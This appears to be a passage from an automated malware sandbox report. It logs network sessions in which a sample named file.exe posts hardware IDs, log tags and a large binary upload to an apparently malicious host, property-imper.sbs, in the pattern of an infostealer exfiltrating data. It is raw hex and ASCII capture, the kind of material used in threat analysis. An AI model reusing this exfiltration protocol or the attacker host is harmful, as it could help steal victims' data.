                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1RPSKO0dXI72PDJgMW9kYKQAh4aOb1%2Fwo5wzEARxLBkY9UGo8RDoGSQ3WzJMoYCfQ1Ly3%2FHEQ4lfU3qE6C0ORckVK9LLBbvLkK%2FMG4POZe2w5YBj%2BqFW8r8CTXNi%2F0s2BohS3ko%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7588f0f85b7c87-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=14&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16025&delivery_rate=1575822&cwnd=199&unsent_bytes=0&cid=04936fb218325445&ts=888&x=0"
                                                                                                                                                                                        2024-11-24 01:13:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                                        2024-11-24 01:13:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.549708104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:12 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=KSO0VDP3
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 20513
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:12 UTC15331OUTData Raw: 2d 2d 4b 53 4f 30 56 44 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4b 53 4f 30 56 44 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 53 4f 30 56 44 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 53 4f 30 56 44 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                        Data Ascii: --KSO0VDP3Content-Disposition: form-data; name="hwid"604BBA8A1C3882ACD7CBBD6DF28D3732--KSO0VDP3Content-Disposition: form-data; name="pid"3--KSO0VDP3Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KSO0VDP3Content-Di
                                                                                                                                                                                        2024-11-24 01:13:12 UTC5182OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88
                                                                                                                                                                                        Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                                                                                        2024-11-24 01:13:13 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=dtjhkg3ro1pqgb56ctsaphica5; expires=Wed, 19-Mar-2025 18:59:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A40HsVy78DDuQtWQGKtZI%2FyMirWnCxiSDvWPOIJp2a4rziTJv1%2Fh9Klh5folmXQBPo735K1rODzs7mO0xXJag9EoXphP97vRsfJ3yFrFruqc5yRY9L%2F%2FPeLIaer9src%2BzDA5g6U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7589008fa47c87-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1803&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21467&delivery_rate=1562332&cwnd=199&unsent_bytes=0&cid=5abc08774f2fbae9&ts=893&x=0"
                                                                                                                                                                                        2024-11-24 01:13:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                                        2024-11-24 01:13:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.549709104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:15 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=RY8HXID9Y
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 1195
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:15 UTC1195OUTData Raw: 2d 2d 52 59 38 48 58 49 44 39 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 59 38 48 58 49 44 39 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 59 38 48 58 49 44 39 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 52 59 38 48 58 49 44 39 59 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                        Data Ascii: --RY8HXID9YContent-Disposition: form-data; name="hwid"604BBA8A1C3882ACD7CBBD6DF28D3732--RY8HXID9YContent-Disposition: form-data; name="pid"1--RY8HXID9YContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--RY8HXID9YConten
                                                                                                                                                                                        2024-11-24 01:13:16 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:16 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=39kprn29gh7u0kdopj1tbp0mqa; expires=Wed, 19-Mar-2025 18:59:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCOs1AG%2BJ65za58EeEMr9X12Vge2gZJooqHoY9D0oDKf2oUA57iaQDnGDkYzDQvDuSRSgP7DVybg72rrzUTML29XTReMie49%2FxovLl3Ka5eim75null2ggzr3tlw5iazCsoQvdU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e758912387fde92-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2105&delivery_rate=1491317&cwnd=252&unsent_bytes=0&cid=0661e29d14c410a6&ts=744&x=0"
                                                                                                                                                                                        2024-11-24 01:13:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                                        2024-11-24 01:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.549712104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:18 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=YWYX5S7DZ8NVEB
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 585883
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 2d 2d 59 57 59 58 35 53 37 44 5a 38 4e 56 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 57 59 58 35 53 37 44 5a 38 4e 56 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 57 59 58 35 53 37 44 5a 38 4e 56 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 57
                                                                                                                                                                                        Data Ascii: --YWYX5S7DZ8NVEBContent-Disposition: form-data; name="hwid"604BBA8A1C3882ACD7CBBD6DF28D3732--YWYX5S7DZ8NVEBContent-Disposition: form-data; name="pid"1--YWYX5S7DZ8NVEBContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YW
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 2c 08 fc 2c e2 9a 03 04 c0 1b 21 3b b5 5a 70 3d c4 e9 c0 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e c8 74 f6 c1 81 96 f9 4d 6f 0b 74 bc e4
                                                                                                                                                                                        Data Ascii: ,,!;Zp=um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN;O_8>tMot
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 83 b2 d7 f4 ce b2 5f f7 df 87 fb 65 c7 c5 c6 6e 68 9d 47 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19 a9 b5 e6 60 65 69 b8 11 29 b0 ea a1 65
                                                                                                                                                                                        Data Ascii: _enhG> s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>`ei)e
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 4a d7 07 ed 7a 4a 68 27 60 59 95 6b 62 fc 56 75 47 cc 0c 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00 4d 15 f4 14 de 9e 7c 6b 94 7a 32 5b a4
                                                                                                                                                                                        Data Ascii: JzJh'`YkbVuG*evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kYWn|M|kz2[
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 4b 12 5e 68 6b 8c 9a e4 f7 a3 37 e4 24 13 bf e3 d0 40 4b 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b 40 20 38 67 d2 b8 7e 8e c0 26 dc 15 0d
                                                                                                                                                                                        Data Ascii: K^hk7$@KB06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK@ 8g~&
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 61 ab 4f 7b 13 42 bd c8 5f 2d 04 67 92 d8 bc fa c0 27 b7 a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c bb a2 56 fb 02 24 fa c7 3d 33 74 e2 09
                                                                                                                                                                                        Data Ascii: aO{B_-g'oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJV$=3t
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: 71 a1 56 33 2b 98 71 4b c7 ee 89 ea c6 dd db ff b9 e0 91 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef a6 e8 dc 13 67 1c c3 68 fd ec b1 35 6b
                                                                                                                                                                                        Data Ascii: qV3+qK8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40gh5k
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: ae 1f 07 df 32 f4 17 08 84 c0 ca f6 6a 15 e6 57 d9 2d bc df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8 3a d5 ea d5 9b 8d 69 0e 77 f0 59 b1 d3
                                                                                                                                                                                        Data Ascii: 2jW-Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(:iwY
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: bb 7b 13 0e 6b b8 fd 1d 57 73 36 8f 5a 8c c1 68 46 6b 37 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d 52 30 05 8e ae 02 a8 7c f9 b0 d0 78 38
                                                                                                                                                                                        Data Ascii: {kWs6ZhFk72 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={=R0|x8
                                                                                                                                                                                        2024-11-24 01:13:18 UTC15331OUTData Raw: f0 13 db f3 f6 15 a2 7e 93 e2 4e 1f 73 90 75 5e 68 0b fb 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5 9a 55 25 27 1d 84 86 92 c8 8d 31 08 2e
                                                                                                                                                                                        Data Ascii: ~Nsu^hETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`c TxjXcU%'1.
                                                                                                                                                                                        2024-11-24 01:13:22 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:22 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=8giai184mqsrrttdjg761bd1p5; expires=Wed, 19-Mar-2025 18:59:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBekmezVyBcr%2FmJFXO5Oi293Q%2B6DYECK%2B44jVGKwnxLetvETFsy9L66l03YXRHhLjc%2FcS6RWdpCYm2SNWssWYU1wCy9GlWShTvf87Envt20V9tI1ePPg4p6nIJ3nIDNPgG39AaU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e758922bdf3426a-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1646&sent=204&recv=606&lost=0&retrans=0&sent_bytes=2845&recv_bytes=588472&delivery_rate=1805813&cwnd=223&unsent_bytes=0&cid=6aec02048e231db1&ts=3842&x=0"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        7192.168.2.54971020.109.210.53443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=r+aWDcu63agkNoh&MD=V16GSvzv HTTP/1.1
